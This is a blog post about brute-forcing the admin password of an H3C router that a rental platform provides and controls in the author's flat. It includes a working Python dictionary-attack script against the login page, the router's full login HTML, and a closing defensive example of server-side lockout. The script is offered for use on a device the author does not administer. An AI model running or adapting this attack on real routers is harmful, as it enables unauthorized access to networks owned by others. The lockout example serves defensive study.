Brute-Forcing a Router's Admin Password

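After moving into my new place, the first thing I did was get online and log in to the router's admin console. The flat I rent comes from a rental platform, and the network is provided by the platform. Unlike my previous rental, this time the router's admin password was actually different from the Wi-Fi password I was given, so someone must have changed it! I tried admin and other weak passwords, and none of them worked! For an IT person, having someone else hold the power of life and death over my network is simply intolerable!

In my first test I tried logging in to the router over telnet and found that the password had been changed and I could not log in; I assume it was changed together with the web console password.

With no other option, I had to look into the web login page.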

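To brute-force it, we need code that constructs the HTTP requests, so we need to know the following:

1. What the login request URL is

2. What the request format is

3. How to tell that a login has succeeded

4. Whether there is any blacklisting against brute-forcing (if so, we would need to change our MAC address)

5. A dictionary for the brute-force

Enough talk, let's try it.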

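So I tried a login; after it failed, there was a wrong-password message:

The Network panel looks as follows; it is clearly a synchronous form submission. Anyone who knows HTTP knows that a synchronous form submission puts the form data in the body, stored in the form [parameter name]=[value]

With that, we have the request URL and the parameters for constructing the request.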

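Next, let's work out what makes the error message pop up:

Because it is a synchronous submission, it is essentially a page navigation, so the HTML content is obviously in the response,

A quick Ctrl+F found the JS for the wrong-password message; you can see that checkPsdFlag is the key: checkPsdFlag='false'.

That is what pops up the wrong-password message; looking further up, 'true'==checkPsdFlag means the login succeeded.

The curious part is that checkPsdFlag is cut out of the resultInfo string.

Doesn't that mean this page always reports a failed login? Exactly!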

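Remember what I said above: this is a synchronous request. So I suspect resultInfo is rendered by the backend code,

on failure it is var resultInfo="false;0"; and on success it is var resultInfo="true;0";

The evidence is below: after three failed logins, refresh this page:

So the condition for a successful login is that the returned HTML contains var resultInfo="true;0";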

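From what I could tell, this page does not record login attempts; even the login count is stored in a cookie, which makes it fairly naive code (。≖ˇェˇ≖。)

So there is no need to change the MAC address to fool the router. Just brute-force it directly.

So I wrote some Python code [written rather casually, just to crack the password, so I did not bother to wrap it up neatly ( ᖛ ̫ ᖛ )ʃ)]

The dictionary is fairly large, so the file loop takes a parameter for how many lines to skip [that way, if the run does not finish today, next time I can skip the lines already read and carry on from there]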

# -*- coding: utf-8 -*-

import requests
from itertools import islice

# Headers copied from the browser's login request; the cookies are the ones
# the login page's JavaScript sets.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
    'Cookie': 'LOGINCOUNT=1; LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true'
}

def post(passwd):
    # Submit one candidate as a form field; passing a dict lets requests
    # URL-encode the value and set the form Content-Type.
    res = requests.post(url="http://192.168.124.1/router_password_mobile.asp",
                        data={"psd": passwd}, headers=headers)
    # The backend renders this marker into the page only on a successful login.
    return 'var resultInfo="true;0";' in res.text

def record(content):
    # Overwrite the progress file with the latest checkpoint or the result.
    with open("E:/work/36.4GB-18_in_1.lst/passwd.txt", 'w') as file:
        file.write(content)

def readDic(skip):
    # skip: number of dictionary lines already tried in earlier runs.
    linenum = skip - 1
    with open("E:/work/36.4GB-18_in_1.lst/18_in_1.lst", 'r') as file:
        for line in islice(file, skip, None):
            linenum = linenum + 1
            line = line.replace('\n', "")
            res = post(line)
            print(str(linenum) + " " + line + " " + str(res), end="|")
            if res:
                print("FOUND!")
                record("FOUND! " + str(linenum) + " " + line + " " + str(res))
                break
            if linenum % 1000 == 0:
                # Checkpoint every 1000 lines so a later run can resume.
                record(str(linenum) + " " + line + " " + str(res))

if __name__ == "__main__":
    readDic(0)

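Here record writes down the line number every 1000 lines, and writes down the correct password when the crack succeeds. You need to download a dictionary from the internet yourself.

Then the cracking can begin:

The output records line number, password and result

Finally, here is the source of the page the router returns ฅ•ﻌ•ฅ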

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<HTML><HEAD>
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META HTTP-EQUIV=Pragma CONTENT=no-cache>
<meta name="viewport" content="user-scalable=0" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
<title>H3C&nbsp;Magic R2+Pro千兆版&nbsp設備登錄</TITLE>
<LINK Rel="SHORTCUT ICON" href="favicon.ico" type="image/x-icon">
<LINK href=er_globe.css type=text/css rel=stylesheet>
<SCRIPT src=icg_helpScript.js></SCRIPT>
<SCRIPT language=JavaScript src=icg_utils.js></SCRIPT>
<SCRIPT src=utils.js></SCRIPT>
<script src=globalFunctions.js type=text/javascript></script>
<script src=main.js type=text/javascript></script>
<SCRIPT src=Scg_cookie.js></SCRIPT>

<SCRIPT language=JavaScript>


var sys_version = "R2+ProGV100R006L01";
var Product_Type = "R2+ProG";
var mac_addr = "78:2C:29:DF:91:86";
var lan_local_info='192.168.124.1;255.255.255.0;0;78:2C:29:DF:91:86';

var PRODUCT_FORUM_URL = "http://bbs.h3c.com";
var PRODUCT_APPLICATION_URL = "http://magic.h3c.com/rest/magic/getApp";
var bPwdIsSyncByAc = 0;
var DefaultLoginflag = 0;
var admin_same_flag = 0;
var IsSupportPcWebOnly = 0;

var tt = lan_local_info.split(";");
var ip_addr = tt[0];
var telnumber = "400 600 6363";
var user_level = 1;

/* Get the system type (PC or Mobile) */
var isMobileSyetem = checkMobile();
var isAppleSystem = checkAndroidOrApp();

function wifi_init()
{
    /*Begin: Added by y09312 of 2015-03-03*/
    /* If the router login page is only a child page, switch its top-level page to the current login page. */
    var parentPage = top.window.location.toString().replace(/.*\//,'');
    parentPage=parentPage.replace(/\?.*/,'');

    if(parentPage != cPage)
    {
        top.window.location = cPage;
    }
    /*End: Added by y09312 of 2015-03-03*/
    
    document.getElementById("psd").value = "";
    document.router_password_set.psd.focus();
}

function onBodyLoad()
{
    /* Clear the cookies when the login page is refreshed or the submission fails. */
    deleteCookie("USERLOGINIDFLAG");
    deleteCookie("MAIN_FLAG");
    deleteCookie("MOBILE_FLAG");
	
    wifi_init();
    
    var flag = getCookie("PSWMOBILEFLAG");
    if("true" == flag)
    {
        var resultInfo="false;0";
        var resultArray = resultInfo.split(";");
        var checkPsdFlag = resultArray[0];
        var sessionid = resultArray[1];
        
        if ("true" == checkPsdFlag)
	    {
            /* Update the cookie only after the password has been verified successfully. */
            addCookie("USERLOGINIDFLAG", sessionid);
            deleteCookie("LOGINCOUNT");

			if (1 == IsSupportPcWebOnly)
			{
				GURL("home.asp");
			}
			else
			{
				GURL("mobile.asp");
			}
		    
            return;
	    }
	    else if("false" == checkPsdFlag)
	    {	    			  
		    /*Begin Modified by y09312 2016-06-16, IDMS: 201606300144, of fixing the Webs process hang when the number of web login users exceeds the limit*/
            if(1 == sessionid)
            {
                mobile_display_message("warningmsg", "訪問用戶個數超過最大限制。");
            }
            else
            {
            	var wrong_logincount = getCookie("LOGINCOUNT");

				if ("3" == wrong_logincount)
				{
					deleteCookie("LOGINCOUNT");
					GURL("wrong_login.asp");
				}
				else
				{
	                mobile_display_message("warningmsg", "密碼錯誤,請重試。");

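                    /* When the browser is first opened the cookie value is empty; in IE, empty is undefined; in Firefox, empty can be tested directly; the other mainstream browsers fall under one of these two cases. */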
					if (("" == wrong_logincount) || ("undefined" == typeof(wrong_logincount)))
					{
						addCookie("LOGINCOUNT", "1");
					}
					else if ("1" == wrong_logincount)
					{
						addCookie("LOGINCOUNT", "2");
					}
					else if ("2" == wrong_logincount)
					{
						addCookie("LOGINCOUNT", "3");
					}
				}									
            }
	        /*End Modified by y09312 2016-06-16, IDMS: 201606300144, of fixing the Webs process hang when the number of web login users exceeds the limit*/
            document.getElementById("psd").select();
	    }
    }

    /* Dynamically adjust the page width and height according to the screen resolution. */
    var screen_width = screen.availWidth;
    var screen_height = screen.availHeight;

    document.getElementById("formbackground").style.width = screen_width;
    document.getElementById("formbackground").style.height = screen_height;
    
    deleteCookie("PSWMOBILEFLAG");
    deleteCookie("LOGIN_PSD_REM_FLAG");

    return;
}

function mySubmit()
{
	var sUserPass = document.getElementById("psd").value;

    document.getElementById("warningmsg").innerHTML="";
	document.getElementById("warningmsg").height = 1;
    
	if (0 == sUserPass.length)
	{
        mobile_display_message("warningmsg", "請輸入密碼。");
		
	    document.getElementById("psd").focus();
	    return false;
	}

    if(document.getElementById("psd_en").checked == true)
    {
        addCookie("LOGIN_PSD_REM_FLAG", 1);
    }
    else
    {
        addCookie("LOGIN_PSD_REM_FLAG", 0);
    }
    
    addCookie("PSWMOBILEFLAG", "true");
	
    document.router_password_set.submit();
	return true;
}

function GURL(page)
{
	window.location = page;
}

function link(item)
{
    document.getElementById(item).href = PRODUCT_APPLICATION_URL; 
    document.getElementById(item).target = "_blank";
}

function mouseOn(item)
{
	document.getElementById(item).style.textDecoration= 'underline';
}

function mouseOut(item)
{
    document.getElementById(item).style.textDecoration= 'none';
}

function accept_it()
{
    deleteCookie("LOGINCOUNT");
	GURL("wrong_login.asp");
}

</SCRIPT>
</HEAD>
<body bgcolor=#ffffff leftMargin=0 topMargin=0 MARGINWIDTH=0 MARGINHEIGHT=0 BORDER=0 onload=onBodyLoad()>

<div id="formbackground" name="formbackground" style="position:absolute; z-index:-1;">
  <SCRIPT language=JavaScript>
      if(true == isMobileSyetem)
      {
          document.write('<img id="bodyimg" name="bodyimg" src="bg_mobile2.jpg" height="100%" width="100%">');
      }
      else
      {
          document.write('<img id="bodyimg" name="bodyimg" src="bg_pc2.jpg" height="100%" width="100%">');
      }
	  
  </SCRIPT>
</div>

<table id="firstTable" border=0 width="100%" height=60 style="background-color:#4670a9;">
<TR> 
    <TD width=5%></TD>
    <TD width=25%>
        <div align=left><IMG id="go" name="go" src="h3c_logo.png" class=mobileH3cImg onclick="goto_H3C()"></div></TD>
    <TD width=40%></TD>
    <TD width=25%></TD>
    <TD width=5%></TD>
</TR>
</table>

<FORM action="" method="POST" name=router_password_set>
<TABLE cellSpacing=0 cellPadding=3 border=0 width=100%>
  <TBODY>
    <TR>
      <TD align=center height=20 colspan=3></TD>
    </TR>
    
    <TR>
      <TD width=10%></TD>
      <TD width=80% align=left height=40><span style="width:100%; height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:16px;">管理密碼</span></TD>
      <TD width=10%></TD>
    </TR>

    <TR>
      <TD align=center height=40 colspan=3>
        <INPUT type=password id="psd" name="psd" maxlength="63" style="width:80%;" class=mobileText onkeypress="onEnterSub_Firefox(event,mySubmit,user_level)" onpaste="return false;">
        <input type=text style="display:none;">
      </TD>
    </TR>

    <TR>
      <TD WIDTH=10%></TD>
      <TD WIDTH=80% align=left>
        <INPUT id="psd_en" name="psd_en" type=checkbox>
        <span style="height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:13px;">記住密碼</span>
        <span>&nbsp</span>
		<span style="height:30; text-align:left; color:#33bcef; font-family:Microsoft YaHei; font-size:13px; cursor:pointer; text-decoration:underline;" onclick="accept_it();" >忘記密碼?</span>
        </TD>
       <TD WIDTH=10%></TD>
    </TR>
        
    <SCRIPT language=JavaScript>
      if(1 == bPwdIsSyncByAc)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前管理密碼與管理器的密碼一致。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
      }
      else if(1 == DefaultLoginflag)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前爲默認密碼【admin】。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
        
      }
      else if(1 == admin_same_flag)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前管理密碼與Wi-Fi密碼一致。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
      }
    </SCRIPT>    
    <TR>
      <TD WIDTH=10%></TD>
      <TD WIDTH=80% align=left class=mobileWarnningTxt id="warningmsg" name="warningmsg"></TD>
      <TD WIDTH=10%></TD>
    </TR>

    <TR><TD align=center height=10 colspan=3></TD></TR>
    <TR><TD align=center height=40 colspan=3>
        <input name="login" id="login" type=button style="WIDTH:80%; HEIGHT:45px;" class=mobileButton value="登錄" onclick="mySubmit();">
    </TD></TR>

    <TR><TD align=center colspan=3>
      <SCRIPT language=JavaScript>
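      /* The following products support the app: B1, B1ST, F1, R2+, R2+pro */
      /* The following products do not support the app: B0, B3, R100 */
      /* On PC, show the QR code images for the app and WeChat; on mobile, show only the app link */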
      if (("B3" != Product_Type) && ("B0" != Product_Type) && ("R100" != Product_Type))
      {
	      /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */
	      if(true == isMobileSyetem)
	      {
              if("" != PRODUCT_APPLICATION_URL)
              {
    	          document.write('<TR><TD height=100 align=center colspan=3 style="FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;">');
    	          document.write('<a id="APP_URL" name="APP_URL" style="text-decoration:underline;cursor:pointer; FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;" onclick="link(\'APP_URL\');">點擊下載華三魔術家APP</a>');
    	          document.write('</TD></TR>');
              }
	      }
	      /* End modify by w12167, 2015-1-4, IDMS:201601040185 */
	      else
	      {
	          /* Begin modify by w12167,2-15-12-10.IDMS:201511250468 */
	          /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          // If it is a PC, show the QR codes.
	          document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');
	          document.write('<TR><TD align=center colspan=3>');
			  if ("A210-G" != Product_Type)
			  {
		          document.write('<a><img src="magic_app.jpg" border="0" style="height:236px; width:200px;"></a>');
				  document.write('<label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</label>');
			  }
	          document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');
	          document.write('</TD></TR>');
			  /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          /* End modify by w12167,2-15-12-10.IDMS:201511250468 */
	      }
      }
	  else
	  {
		  /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */
	      if(true == isMobileSyetem)
	      {
	      	  ;
	      }
	      /* End modify by w12167, 2015-1-4, IDMS:201601040185 */
	      else
	      {
	          /* Begin modify by w12167, 2015-12-11, IDMS:201511250468 */
	      	  /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          // If it is a PC, show the QR code.
	          document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');
	          document.write('<TR><TD align=center colspan=3>');
	          document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');
	          document.write('</TD></TR>');
			  /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          /* End modify by w12167, 2015-12-11, IDMS:201511250468 */
	      }
	  }
      </SCRIPT>
    </TD></TR>
  </TBODY>
</TABLE>
</FORM>
</BODY>
</HTML>
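
The page source above keeps the failed-login count in the client-side LOGINCOUNT cookie, so a client that never updates the cookie is never slowed down. The following Python is an added example (not the router's firmware and not the author's code) that contrasts a counter taken from the cookie with one kept on the server per client address. The handler functions, the 300-second lockout, the client address and the password are all constructed assumptions; only the cookie name and the threshold of 3 come from the page.

```python
import hmac

MAX_FAILURES = 3        # same threshold the page's JavaScript uses for LOGINCOUNT
LOCKOUT_SECONDS = 300   # assumed lockout window, not taken from the router

def cookie_counted_login(password, cookies, real_password):
    """Weak model: the failure count is read from a client-supplied cookie."""
    if int(cookies.get("LOGINCOUNT", "0")) >= MAX_FAILURES:
        return "locked"
    ok = hmac.compare_digest(password.encode(), real_password.encode())
    return "ok" if ok else "wrong"

class ServerSideLimiter:
    """Hardened model: failures are counted on the server, per client address."""
    def __init__(self, real_password, clock):
        self.real_password = real_password
        self.clock = clock          # injectable time source, so tests need no sleep
        self.failures = {}          # client address -> (count, time of last failure)

    def login(self, client, password):
        count, last = self.failures.get(client, (0, 0.0))
        if count >= MAX_FAILURES:
            if self.clock() - last < LOCKOUT_SECONDS:
                return "locked"     # the password is not even checked while locked
            count = 0               # lockout expired, start counting again
        if hmac.compare_digest(password.encode(), self.real_password.encode()):
            self.failures.pop(client, None)
            return "ok"
        self.failures[client] = (count + 1, self.clock())
        return "wrong"

def simulate(guesses, real_password="constructed-secret"):
    """Replay the same guesses against both models, always sending LOGINCOUNT=1."""
    now = [0.0]
    limiter = ServerSideLimiter(real_password, clock=lambda: now[0])
    weak, hardened = [], []
    for guess in guesses:
        weak.append(cookie_counted_login(guess, {"LOGINCOUNT": "1"}, real_password))
        hardened.append(limiter.login("192.168.124.50", guess))  # constructed address
        now[0] += 1.0               # one second between attempts
    return weak, hardened

if __name__ == "__main__":
    print(simulate(["a", "b", "c", "d", "constructed-secret"]))
```

With the server-side counter the fourth and fifth attempts are refused without the password being checked, so even the correct guess does not get through during the lockout.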
